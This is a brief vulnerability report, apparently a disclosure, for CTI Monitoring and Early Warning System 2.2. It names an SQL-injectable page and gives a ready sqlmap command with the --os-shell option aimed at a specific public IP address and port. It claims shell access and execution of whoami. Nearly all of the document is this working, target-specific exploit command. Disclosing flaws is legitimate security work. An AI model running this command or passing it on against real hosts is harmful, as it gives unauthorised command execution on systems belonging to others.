There is a command execution vulnerability in CTI Monitoring and Early Warning System 2.2
version:v2.2
In the path /Web/SysManage/UserEdit.aspx?&ID=0, you can use sqlmap to generate delayed injection and successfully getshell and perform command execution operations.
sqlmap command:python.exe sqlmap.py -u " http://110.167.122.134:9900/ Web/SysManage/UserEdit.aspx?&ID=0" --os-shell –batch
existence introduction
Write to shell and execute the whoami command
